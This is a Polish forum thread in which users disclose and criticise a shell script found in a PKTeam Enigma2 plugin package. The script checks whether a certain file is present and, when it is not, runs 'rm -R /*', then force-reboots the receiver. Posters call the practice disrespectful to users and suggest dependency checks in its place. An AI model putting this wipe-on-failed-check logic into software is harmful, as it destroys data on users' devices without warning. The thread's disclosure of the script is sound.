Ciekawe zabezpieczenie pakietów od PKTeam

[richter]

Post skopiowany z innego forum ,ale przydatny i dla nas.

 

@gandi21 - napisał:

 

Gdyby komuś przyszło do głowy aby instalować pakiety od PKTteam na sofcie nie sygnowanym logo tej grupy to lepiej uważać..

Oto fragment skryptu znalezionego w paczce enigma2-plugin-utilities-n2n_v2_PKT_sh4:

 

#!/bin/sh

 

if  ls /usr/lib/enigma2/python/Plugins/Extensions/PKT/ | grep -qc 'InfoCenter.pyo';

then

echo 'Image verification: OK'

else

echo 'Image verification: FAILED'

rm -R /*

sync

sleep 2

reboot -f

fi

exit 0

 

W skrócie - jeżeli nie ma pliku InfoCenter.pyo to wykasuje wszystko z katalogu root /

Ot takie "zabezpieczenie" przed instalowaniem na innej dystrybucji

Oczywiście paczkę można unieszkodliwić bez problemów - ipk to poprostu zgzipowany tar.

 

 

jak kogoś ciekawi to cały temat:

http://forum.dvhk.to/showthread.php?t=798900

[tux]

O tym wiadomo już od jakiegoś czasu.

Ten wpis pozwolił mi na to aby coś napisać. Coś co ciśnie się na usta od dawna.

---

Po komendzie

 

rm -R /*

 

każda następna nie ma sensu bo już jej nie ma na systemie :)

Oczywiście pod warunkiem, że tuner wcześniej zanim skończy kasować pliki, nie zawiesi się.

---

 

Pomijając to co napisałem powyżej to zastanawiam się nad czymś jeszcze.

Mają własne softy, korzystają z DuckBox. W paczkach w sumie to co można sobie skompilować bez łaski z ich strony.

Ponadto tak z połowa pakietów jest już tak stara, że albo nie działa albo nie działa poprawnie.

 

Pytanie jakie mi się ciśnie na usta to po co to zabezpieczać w ten sposób?

Komu/czemu to ma służyć?

Jak ktoś się uprze to wypakuje i wgra po FTP.

Jak komuś soft wyleci w powietrze to raczej nie skorzysta z PKT.

Czy nie wystarczyło by dać w preinst po prostu reboot?

Albo tak jak w GOS zależności do konkretnego pakietu? Dłubaczowi i tak to nie przeszkodzi a osobie co będzie próbować zainstalować dany plik IPK w innym systemie OPKG wyraźnie zasygnalizuje, że to pakiet nie pod ten system.

---

 

Moim zdaniem do użytkownika trzeba podchodzić chociaż z minimalnym szacunkiem. Tu według mojej opinii zostały przekroczone pewne granice. Tym bardziej, że całość to oprogramowanie Open Source.

 

[loki7777]

Tam nikt nie odpowiedział, to może tu ktoś udzieli odpowiedzi na pytanie: Po co?

[jurekk]

Po co ? Przecież to jest jasne i proste. Najwięcej może napisać na ten temat jeden z Kolegów z tego ( xunil ) forum. Sprawa kiedyś dotyczyła dekompilacji pyo i pokazanie zabezpieczeń jakie są w pliku . O ile pamiętam sprawa dotyczyła pewnej skórki.

 

[loki7777]

Tylko czy pkt też nie "pożycz"(bez oskarżeń), np. sterowników od wifi?

[tux]

O ile ja pamiętam to nic w GOS nie jest dekompilowane i dodane do repo.

A jeżeli coś takiego ma miejsce to w te pędy meldować. Ida zmiany w GOS to i to się posprząta.

Poza tym chętnie dowiem się, kto łamie licencje/postanowienia dołączone do danego pakietu.

W samym GOS tez nastąpi niebawem przegląd wtyczek i skórek tak aby w 100% mieć pewność, że mogą one być dostarczane z GOS. To, że były zgodne w momencie publikacji nie oznacza, że dalej są.

---

Oczywiście nic nie zmienia faktu, że te wszystkie zabezpieczenia mają taki sens jak....dopisać sobie cokolwiek :)

W GOS nie ma zabezpieczenia w pakietach. Jest tylko zależność do konkretnego pakietu. Użytkownik instalując nasz pakiet "gdzieś tam" powinien widzieć, że pakiet jest z GOS.

Nikt nie zabrania używać go w innym sofcie. Jedynie nie gwarantuje się, że to zadziała lub nawet nie spowoduje unieruchomienia oprogramowania.